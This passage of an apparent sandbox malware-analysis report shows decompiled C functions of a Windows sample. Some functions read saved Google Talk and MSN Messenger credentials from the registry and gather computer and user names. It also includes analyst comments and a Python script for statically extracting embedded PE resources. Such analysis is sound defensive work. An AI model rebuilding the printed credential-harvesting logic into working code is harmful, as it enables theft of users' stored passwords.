		 *(_t35 + 0x258) = 0;
	}
	_t24 = E0040625C(); // executed
	 *(_t35 + 0x258) = _t24;
	E004019DA(_t37, _t35 + 0x158, 0x414490);
	_v264 = 0;
	memset( &_v263, 0, 0xff);
	_t28 = LoadIconA( *0x417b94, 0x65); // executed
	_v8 = _t28;
	strcpy(_t35 + 4, E004019DA(_t37,  &_v264, 0x414478));
	 *(_t35 + 0x104) = _v8;
	return _t35;
}

Instruction addresses: 0x0040b91e, 0x0040b91e, 0x0040b92b, 0x0040b931, 0x0040b937, 0x0040b93d, 0x0040b93f, 0x0040b945, 0x0040b94d, 0x0040b956, 0x0040b956, 0x0040b94f, 0x0040b94f, 0x0040b94f, 0x0040b95d, 0x0040b963, 0x0040b968, 0x0040b96a, 0x0040b96b, 0x0040b976, 0x0040b976, 0x0040b96d, 0x0040b96f, 0x0040b96f, 0x0040b978, 0x0040b97e, 0x0040b984, 0x0040b98a, 0x0040b990, 0x0040b996, 0x0040b99e, 0x0040b9a1, 0x0040b9a7, 0x0040b9a7, 0x0040b9ad, 0x0040b9bd, 0x0040b9c3, 0x0040b9d6, 0x0040b9dd, 0x0040b9ed, 0x0040b9fe, 0x0040ba0b, 0x0040ba16, 0x0040ba20

APIs
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ??2@$DeleteIconLoadObjectmemsetstrcpy
• String ID:
• API String ID: 3205015851-0
• Opcode ID: 2f8cdf16a645c1e46d6d809924f7a96c7986c5714da08ba0cbdd4ae4d3acf295
• Instruction ID: 1611dc68708d9a603d76385fea93fddb5fcd3a07b13b65f331774950c43fbb3a
• Opcode Fuzzy Hash: 2f8cdf16a645c1e46d6d809924f7a96c7986c5714da08ba0cbdd4ae4d3acf295
• Instruction Fuzzy Hash: 9C2192F19002509BCB50EF758E897C97BA8AB44705F1444BBEE0CEF296D7B845818BAD
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 96%
E004076B7(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
	void* _v0;
	char _v4;
	long _t29;
	void* _t33;
	void* _t36;
	signed int _t54;
	void* _t56;
	void* _t57;
	void* _t58;

	_t50 = __ecx;
	E00412360(0x1110, __ecx);
	E004073B6(_a4); // executed
	_t29 = E0040F1B0(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
	_t56 = (_t54 & 0xfffffff8) + 0xc;
	if(_t29 == 0) {
		_a4 = 0;
		_a12 = 0;
		memset( &_a13, 0, 0xff);
		_t57 = _t56 + 0xc;
		_t33 = E0040F276(_v0, 0,  &_a12);
		while(1) {
			_t58 = _t57 + 0xc;
			if(_t33 != 0) {
				break;
			}
			_t36 = E0040F1B0(_v0,  &_a12,  &_a8);
			_t57 = _t58 + 0xc;
			if(_t36 == 0) {
				_a268 = 0;
				memset( &_a269, 0, 0xfff);
				E0040F1F1(0xfff, _t50, _a8, "pw",  &_a268);
				_t57 = _t57 + 0x18;
				E00407570( &_a268, _a4,  &_a12);
				RegCloseKey(_v0);
			}
			_a4 = _a4 + 1;
			_t33 = E0040F276(_v0, _a4,  &_a12);
		}
		_t29 = RegCloseKey(_v0);
	}
	return _t29;
}













APIs
  • Part of subcall function 004073B6: memset.MSVCRT ref: 00407418
  • Part of subcall function 004073B6: memset.MSVCRT ref: 0040742C
  • Part of subcall function 004073B6: memset.MSVCRT ref: 00407446
  • Part of subcall function 004073B6: memset.MSVCRT ref: 0040745B
  • Part of subcall function 004073B6: GetComputerNameA.KERNEL32 ref: 0040747D
  • Part of subcall function 004073B6: GetUserNameA.ADVAPI32(?,?), ref: 00407491
  • Part of subcall function 004073B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074B0
  • Part of subcall function 004073B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074C5
  • Part of subcall function 004073B6: strlen.MSVCRT ref: 004074CE
  • Part of subcall function 004073B6: strlen.MSVCRT ref: 004074DD
  • Part of subcall function 004073B6: memcpy.MSVCRT ref: 004074EF
  • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
• memset.MSVCRT ref: 00407705
  • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
• memset.MSVCRT ref: 00407756
• RegCloseKey.ADVAPI32(?,?,?), ref: 00407794
• RegCloseKey.ADVAPI32(?), ref: 004077BB
Strings
• Software\Google\Google Talk\Accounts, xrefs: 004076D6
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
• String ID: Software\Google\Google Talk\Accounts
• API String ID: 2959138223-1079885057
• Opcode ID: c9cce60634fc59fb7108b3190625f52d3406a5535f91f01c2962c8a28a0ab0b7
• Instruction ID: a99152f29cb3baba476c483fa4670b136c65b11177ef5495e630776d68c42b47
• Opcode Fuzzy Hash: c9cce60634fc59fb7108b3190625f52d3406a5535f91f01c2962c8a28a0ab0b7
• Instruction Fuzzy Hash: 93219471408209BED610DE51DD42EABBBECEF84344F00043AB944D1192E635DD5D9BA7
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 64%
E0040A6C6(void* __eax) {
	void* __esi;
	_Unknown_base(*)()* _t26;
	void* _t31;
	intOrPtr _t34;
	char* _t44;
	void* _t45;
	intOrPtr* _t46;
	int _t47;

	_t45 = __eax;
	_t37 =  *((intOrPtr*)(__eax + 0x37c));
	_t47 = 0;
	if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
		do {
			_t31 = E00406F55(_t47, _t37);
			_push(_t31);
			_push("/sort");
			L0041207E();
			if(_t31 == 0) {
				_t4 = _t47 + 1; // 0x1
				_t44 = E00406F55(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
				_t54 =  *_t44 - 0x7e;
				_t34 =  *((intOrPtr*)(_t45 + 0x370));
				if( *_t44 != 0x7e) {
					_push(0);
				} else {
					_push(1);
					_t44 = _t44 + 1;
				}
				_push(_t44);
				E0040A283(_t34, _t54);
			}
			_t37 =  *((intOrPtr*)(_t45 + 0x37c));
			_t47 = _t47 + 1;
		} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
	}
	E00405E36();
	 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
	 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
	if(E00406F65( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
		_t46 =  *((intOrPtr*)(_t45 + 0x370));
		if( *0x41848c == 0) {
			 *0x418490 =  *((intOrPtr*)(_t46 + 0x1ac));
			 *0x41848c = 1;
		}
		_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A25D);
		qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
	}
	return SetCursor( *0x417b98);
}

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                  • String ID: /nosort$/sort
                                                                                                                                                                  • API String ID: 882979914-1578091866
                                                                                                                                                                  • Opcode ID: b62834dc514b00cfd30f714a9fad692c6252d4fd7e33ed5c13f61842356538e2
                                                                                                                                                                  • Instruction ID: d235f9a75b77abe912022d820ae93ced97f95949ab3107a8ace45c524b087071
                                                                                                                                                                  • Opcode Fuzzy Hash: b62834dc514b00cfd30f714a9fad692c6252d4fd7e33ed5c13f61842356538e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 5421C170704602EFC719EF75C884A95B7A9FF48314B10413EF529A7291DB39AC218B8A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 25%
                                                                                                                                                                  			E0040F4CA(char* __edi, void* __esi) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				char _v40;
                                                                                                                                                                  				void _v299;
                                                                                                                                                                  				char _v300;
                                                                                                                                                                  				void* _t32;
                                                                                                                                                                  				char* _t37;
                                                                                                                                                                  				void* _t38;
                                                                                                                                                                  
                                                                                                                                                                  				_t38 = __esi;
                                                                                                                                                                  				_t37 = __edi;
                                                                                                                                                                  				E0040F41D();
                                                                                                                                                                  				if( *0x41851c == 0 ||  *((intOrPtr*)(E00406282() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
                                                                                                                                                                  					_v300 = 0;
                                                                                                                                                                  					memset( &_v299, 0, 0x103);
                                                                                                                                                                  					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
                                                                                                                                                                  						_push( &_v8);
                                                                                                                                                                  						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
                                                                                                                                                                  						_push(0x80000002);
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push( &_v8);
                                                                                                                                                                  						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
                                                                                                                                                                  						_push(0x80000001);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(E0040F1B0() == 0) {
                                                                                                                                                                  						E0040F44C(_t38);
                                                                                                                                                                  						E0040F1F1(0x104,  &_v40, _v8,  &_v40,  &_v300);
                                                                                                                                                                  						RegCloseKey(_v8);
                                                                                                                                                                  					}
                                                                                                                                                                  					strcpy(_t37,  &_v300);
                                                                                                                                                                  					return 0 |  *_t37 != 0x00000000;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t32 =  *0x41851c(0, _t37, _t38, 0); // executed
                                                                                                                                                                  					return _t32;
                                                                                                                                                                  				}
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040F41D: LoadLibraryA.KERNEL32(shell32.dll,0040BBB8,76D24DE0,?,00000000), ref: 0040F42B
                                                                                                                                                                    • Part of subcall function 0040F41D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F440
                                                                                                                                                                  • memset.MSVCRT ref: 0040F51F
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040F588
                                                                                                                                                                  • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040F596
                                                                                                                                                                    • Part of subcall function 00406282: GetVersionExA.KERNEL32(00418118,0000001A,0040F4E8,00000104), ref: 0040629C
                                                                                                                                                                  Strings
                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040F53A, 0040F54A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                  • API String ID: 181880968-2036018995
                                                                                                                                                                  • Opcode ID: 688813e34a40ff9dac7194856c9665e444ed430276b4d0f07d4d5b497ec3e936
                                                                                                                                                                  • Instruction ID: 8c400c1df07908664f594f880775229253182a5e7b911f92c7f22337ad7f8634
                                                                                                                                                                  • Opcode Fuzzy Hash: 688813e34a40ff9dac7194856c9665e444ed430276b4d0f07d4d5b497ec3e936
                                                                                                                                                                  • Instruction Fuzzy Hash: 34119971801114BADB30AA989C899DF77AC9715308F5400BBFD51B2593D6385F9C8A99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00403946(void* __eflags, void* __fp0, intOrPtr _a4) {
                                                                                                                                                                  				char _v528;
                                                                                                                                                                  				intOrPtr _v540;
                                                                                                                                                                  				char _v796;
                                                                                                                                                                  				char _v1052;
                                                                                                                                                                  				void* _v1056;
                                                                                                                                                                  				void* _v1060;
                                                                                                                                                                  				int _v1064;
				void* __ebx;
				void* __esi;
				void* _t21;
				long _t23;
				void** _t24;
				long _t26;
				int _t32;
				void* _t52;

				_t52 = __fp0;
				_v540 = 0x413eb0;
				E004046E1( &_v528);
				_t32 = 0;
				_v1052 = 0;
				_v796 = 0;
				_v1064 = 0;
				// Three passes: 0 = MSNMessenger key, 1 = MessengerService key, 2 = E0040DC39 path
				do {
					if(_v1064 != _t32) {
						__eflags = _v1064 - 1;
						if(__eflags != 0) {
							_t21 = E0040DC39( &_v1052, __eflags); // executed
						} else {
							// 0x80000001 = HKEY_CURRENT_USER, 0x20019 = KEY_READ
							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
							__eflags = _t23;
							if(_t23 != 0) {
								goto L5;
							} else {
								_t24 =  &_v1060;
								goto L4;
							}
						}
					} else {
						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
						if(_t26 != 0) {
							L5:
							_t21 = 0;
						} else {
							_t24 =  &_v1056;
							L4:
							_t21 = E0040DB04( &_v1052, _t24);
						}
					}
					_t32 = 0;
					// Anything recovered from the opened key is handed to E004038A9 for output
					if(_t21 != 0) {
						E004038A9(_t52, _a4,  &_v1052);
					}
					_v1064 = _v1064 + 1;
				} while (_v1064 <= 2);
				return E004047FB( &_v528);
			}

Instruction addresses (address column of the listing, one entry per statement): 0x00403946, 0x0040395c, 0x00403967, 0x00403972, 0x00403974, 0x00403978, 0x0040397f, 0x00403988, 0x0040398c, 0x004039b9, 0x004039be, 0x004039e1, 0x004039c0, 0x004039d1, 0x004039d3, 0x004039d5, 0x00000000, 0x004039d7, 0x004039d7, 0x00000000, 0x004039d7, 0x004039d5, 0x0040398e, 0x0040399f, 0x004039a3, 0x004039b5, 0x004039b5, 0x004039a5, 0x004039a5, 0x004039a9, 0x004039ae, 0x004039ae, 0x004039a3, 0x004039e6, 0x004039ea, 0x004039f4, 0x004039f4, 0x004039f9, 0x004039fd, 0x00403a16

APIs
  • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
• RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040399F
  • Part of subcall function 0040DC39: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040DD05
  • Part of subcall function 0040DC39: strlen.MSVCRT ref: 0040DD15
  • Part of subcall function 0040DC39: strcpy.MSVCRT(?,?), ref: 0040DD26
  • Part of subcall function 0040DC39: LocalFree.KERNEL32(?), ref: 0040DD33
• RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039D1
Strings
• Software\Microsoft\MessengerService, xrefs: 004039CB
• Software\Microsoft\MSNMessenger, xrefs: 00403999
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
• String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
• API String ID: 1910562259-1741179510
• Opcode ID: cd4cad58a6bbdb2152182e06e1211f683bfeac5af0318659dfdfa5e05705f839
• Instruction ID: a8690c8f59c2d6ddd84299c782105f2e65a9bc437c951c5f77a69b85a32d1474
• Opcode Fuzzy Hash: cd4cad58a6bbdb2152182e06e1211f683bfeac5af0318659dfdfa5e05705f839
• Instruction Fuzzy Hash: 1111D8B1108309AED320EE5198818ABBFEC9B95355F50843FF544A2081D3789A4DCAAB
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040F37C(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;
				unsigned int* _t7;

				// Locate a resource by name/type, then walk its body as 32-bit words
				_t12 = FindResourceA(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2; // word count = resource size / 4
								if( *_t7 != 0) {
									// Rolling arithmetic/xor mix over every word of the resource
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								// Result is folded into the global at 0x418110
								 *0x418110 =  *0x418110 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}

Instruction addresses (address column of the listing, one entry per statement): 0x0040f389, 0x0040f38f, 0x0040f393, 0x0040f3a0, 0x0040f3a4, 0x0040f3aa, 0x0040f3b2, 0x0040f3b5, 0x0040f3bd, 0x0040f3c1, 0x0040f3c4, 0x0040f3c7, 0x0040f3c9, 0x0040f3c9, 0x0040f3cd, 0x0040f3d0, 0x0040f3e0, 0x0040f3e2, 0x0040f3e6, 0x0040f3e6, 0x0040f3ea, 0x0040f3f4, 0x0040f3f4, 0x0040f3bd, 0x0040f3b2, 0x0040f3f9, 0x0040f3ff

APIs
• FindResourceA.KERNEL32(?,?,?), ref: 0040F389
• SizeofResource.KERNEL32(?,00000000), ref: 0040F39A
• LoadResource.KERNEL32(?,00000000), ref: 0040F3AA
• LockResource.KERNEL32(00000000), ref: 0040F3B5
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: 9cd59cfcab74544fb09ebac2717695010326dcaa36405c725c3e94a77d8c1a91
• Instruction ID: 02aaebfec467b3bf7519b160cf801d0b857f87d6ebd9b35fbb0925b6dc32657f
• Opcode Fuzzy Hash: 9cd59cfcab74544fb09ebac2717695010326dcaa36405c725c3e94a77d8c1a91
• Instruction Fuzzy Hash: B601D6327002156BCB294FA5DC45A9BBFAEFF857A1704803AFC09E72A1DB70C905D6C8
Uniqueness

Uniqueness Score: -1.00%
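The four-call sequence recorded above (FindResourceA, SizeofResource, LoadResource, LockResource) is the standard way a Windows image reads a blob stored in its own .rsrc section, and droppers use it to retrieve an embedded payload before decoding or writing it out. The script below is an added example, not code from this report or from the sample: it walks a PE resource directory statically, which is what an analyst does to pull the same blob out of a dumped image without executing it. The minimal PE it builds (one .rsrc section with a single leaf) and the payload bytes are constructed for the demonstration; the resource type RT_RCDATA (10), the ID 101 and the language 0x409 are assumptions, not values recovered from this sample.

```python
import struct

SUBDIR_FLAG = 0x80000000   # high bit of a directory entry's offset: points at a subdirectory
RT_RCDATA = 10             # resource type conventionally used for arbitrary binary blobs


def parse_headers(data):
    """Return (section table, resource-directory RVA) for a PE32 or PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]        # FileHeader.NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]   # FileHeader.SizeOfOptionalHeader
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    dd = opt + (96 if magic == 0x10B else 112)                    # start of DataDirectory[]
    rsrc_rva = struct.unpack_from("<I", data, dd + 2 * 8)[0]      # entry 2 = resource table
    sections = []
    for i in range(nsec):
        hdr = opt + opt_size + 40 * i
        vsize, va, rawsize, raw = struct.unpack_from("<IIII", data, hdr + 8)
        sections.append((va, max(vsize, rawsize), raw))
    return sections, rsrc_rva


def rva_to_offset(sections, rva):
    """Map an RVA to a file offset through the section table (the mapping LoadResource relies on)."""
    for va, size, raw in sections:
        if va <= rva < va + size:
            return rva - va + raw
    raise ValueError("RVA 0x%x not inside any section" % rva)


def walk_resources(data):
    """Return [(path, bytes)] for every leaf; path is (type, name, language), IDs or strings."""
    sections, rsrc_rva = parse_headers(data)
    if rsrc_rva == 0:
        return []
    base = rva_to_offset(sections, rsrc_rva)
    found = []

    def entry_name(field):
        if field & SUBDIR_FLAG:                      # named entry: length-prefixed UTF-16 string
            off = base + (field & 0x7FFFFFFF)
            n = struct.unpack_from("<H", data, off)[0]
            return data[off + 2:off + 2 + 2 * n].decode("utf-16-le")
        return field                                 # numeric ID

    def walk(dir_off, path):
        n_named, n_id = struct.unpack_from("<HH", data, base + dir_off + 12)
        for i in range(n_named + n_id):
            name_field, off = struct.unpack_from("<II", data, base + dir_off + 16 + 8 * i)
            sub = path + (entry_name(name_field),)
            if off & SUBDIR_FLAG:
                walk(off & 0x7FFFFFFF, sub)
            else:                                    # IMAGE_RESOURCE_DATA_ENTRY: RVA, size, codepage, reserved
                data_rva, size = struct.unpack_from("<II", data, base + off)
                start = rva_to_offset(sections, data_rva)
                found.append((sub, data[start:start + size]))

    walk(0, ())
    return found


def find_resource(data, res_type, res_name):
    """Static equivalent of FindResource + LoadResource + LockResource: first language leaf under type/name."""
    for path, blob in walk_resources(data):
        if len(path) == 3 and path[0] == res_type and path[1] == res_name:
            return blob
    return None


def build_sample_pe(payload):
    """Constructed test image (assumption, not this sample): PE32, one .rsrc section, RT_RCDATA/101/0x409 -> payload."""
    rsrc_rva, rsrc_raw = 0x2000, 0x200

    def directory(entries):                          # IMAGE_RESOURCE_DIRECTORY + ID entries only
        hdr = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, len(entries))
        return hdr + b"".join(struct.pack("<II", i, o) for i, o in entries)

    d1 = directory([(RT_RCDATA, SUBDIR_FLAG | 0x18)])   # type level, subdir at +0x18
    d2 = directory([(101, SUBDIR_FLAG | 0x30)])         # name level, subdir at +0x30
    d3 = directory([(0x409, 0x48)])                     # language level, data entry at +0x48
    leaf = struct.pack("<IIII", rsrc_rva + 0x58, len(payload), 0, 0)
    rsrc = d1 + d2 + d3 + leaf + payload
    raw_size = (len(rsrc) + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)               # PE32 magic
    struct.pack_into("<II", opt, 96 + 2 * 8, rsrc_rva, len(rsrc))
    sec = struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), rsrc_rva, raw_size, rsrc_raw, 0, 0, 0, 0, 0x40000040)
    headers = (dos + b"PE\0\0" + file_hdr + bytes(opt) + sec).ljust(rsrc_raw, b"\0")
    return headers + rsrc.ljust(raw_size, b"\0")


if __name__ == "__main__":
    sample = build_sample_pe(b"MZ" + b"\x90" * 40)      # constructed payload that itself looks like a PE
    for path, blob in walk_resources(sample):
        print(path, len(blob), "bytes", "(starts with MZ)" if blob[:2] == b"MZ" else "")
```

Run it on a process dump instead of the constructed image by reading the file and calling walk_resources; a leaf that starts with MZ is the usual sign of a carried second-stage executable, and the dumped image's section table (not the on-disk one) must be used because the dump is a mapped view.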

C-Code - Quality: 95%
// INI-backed configuration accessor: reads or writes one key of a private-profile file.
//   _a4 == 0 : read section _a8 / key _a12 of file _a20 into an 8 KiB stack buffer, then convert
//              the string with E0040680B (apparently according to the value type in _a16)
//   _a4 != 0 : format the value *__edi with E00406792 and write it back with WritePrivateProfileStringA
// _v8200 followed by _v8199 is the decompiler's rendering of a single 0x2001-byte buffer.
E0040F0E3(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
	void _v8199;
	char _v8200;
	void* __ebx;
	int _t23;
	CHAR* _t31;

	E00412360(0x2004, __ecx); // stack probe for the ~8 KiB frame (almost certainly __chkstk)
	_v8200 = 0;
	if(_a4 == 0) {
		memset( &_v8199, 0, 0x2000);
		// 0x41344F is the default-string argument; 0x2000 bounds the copy, so an oversized value is truncated rather than overflowing the frame
		GetPrivateProfileStringA(_a8, _a12, 0x41344f,  &_v8200, 0x2000, _a20); // executed
		_t23 = E0040680B( &_v8200, __edi, _a16);
	} else {
		memset( &_v8199, 0, 0x2000);
		_t31 =  &_v8200;
		E00406792(_t31, _a16,  *__edi); // sprintf/memcpy the value into the buffer (subcall APIs listed below)
		_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
	}
	return _t23;
}









APIs
• memset.MSVCRT ref: 0040F10B
  • Part of subcall function 00406792: sprintf.MSVCRT ref: 004067CA
  • Part of subcall function 00406792: memcpy.MSVCRT ref: 004067DD
• WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040F12F
• memset.MSVCRT ref: 0040F146
• GetPrivateProfileStringA.KERNEL32(?,?,0041344F,?,00002000,?), ref: 0040F164
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: PrivateProfileStringmemset$Writememcpysprintf
• String ID:
• API String ID: 3143880245-0
• Opcode ID: 0d5fc167f86d686615e01c1cacfdddd6df1b8ca8c3ebe4bad4095cdeb2aac3fe
• Instruction ID: bc019f7bd72990c6dd937b38e23e5507a0673011dafb680486f8cad4f2b6b185
• Opcode Fuzzy Hash: 0d5fc167f86d686615e01c1cacfdddd6df1b8ca8c3ebe4bad4095cdeb2aac3fe
• Instruction Fuzzy Hash: DF01657240421DAFEF16AF50DD89EDB7B79EF04344F104076B609A1052D6359A64DB68
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%
// Tear-down counterpart of E004079E7: releases the four global work buffers at 0x418528,
// 0x418530, 0x41852c and 0x418534 if they were allocated. L00412096 is operator delete
// (API ID ??3@ in the metadata below). The pointers are not cleared afterwards, so a second
// call would double-free; the caller is expected to run this once at exit.
E004123F2() {
	intOrPtr _t1;
	intOrPtr _t2;
	intOrPtr _t3;
	intOrPtr _t4;

	_t1 =  *0x418528;
	if(_t1 != 0) {
		_push(_t1);
		L00412096();
	}
	_t2 =  *0x418530;
	if(_t2 != 0) {
		_push(_t2); // executed
		L00412096(); // executed
	}
	_t3 =  *0x41852c;
	if(_t3 != 0) {
		_push(_t3);
		L00412096();
	}
	_t4 =  *0x418534;
	if(_t4 != 0) {
		_push(_t4); // executed
		L00412096(); // executed
		return _t4;
	}
	return _t4;
}








APIs
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: fb7313e2089ba82f806a054faa6efc2dc291e3dbde93792c84ca6474672037a6
• Instruction ID: d787685a6615fa8e7b12f25043f2ee1a52758ce9b2ab1ab1a3353857822e9c29
• Opcode Fuzzy Hash: fb7313e2089ba82f806a054faa6efc2dc291e3dbde93792c84ca6474672037a6
• Instruction Fuzzy Hash: 8FE012703003206A8E30EB7ABF41AC327CDAA18351394C02EF609D2282DEA8DCE0C42C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%
// One-time allocation of four global work buffers, guarded by *0x418540 (zero until the first call):
//   0x418528 <- 0x8000 bytes, 0x418530 and 0x418534 <- 0x100 dwords each, 0x41852c <- 0x1000 bytes.
// L00412090 is the allocator (presumably operator new, the counterpart of the ??3@ operator delete
// called by E004123F2). The `~(0 | _t33 > 0) | _t16` terms are almost certainly the decompiler's
// rendering of the compiler's overflow check on the count*4 byte size (size forced to 0xFFFFFFFF on
// overflow so the allocation fails instead of returning an undersized block).
// Decompiler artifacts: the stores after each call hold the pointer returned in eax, not the pushed
// size constant, and _t13 is uninitialised on the already-initialised path.
E004079E7() {
	void* _t13;
	signed int _t16;
	signed int _t18;
	signed int _t27;
	signed int _t29;
	intOrPtr _t33;

	_t33 =  *0x418540;
	if(_t33 == 0) {
		_push(0x8000);
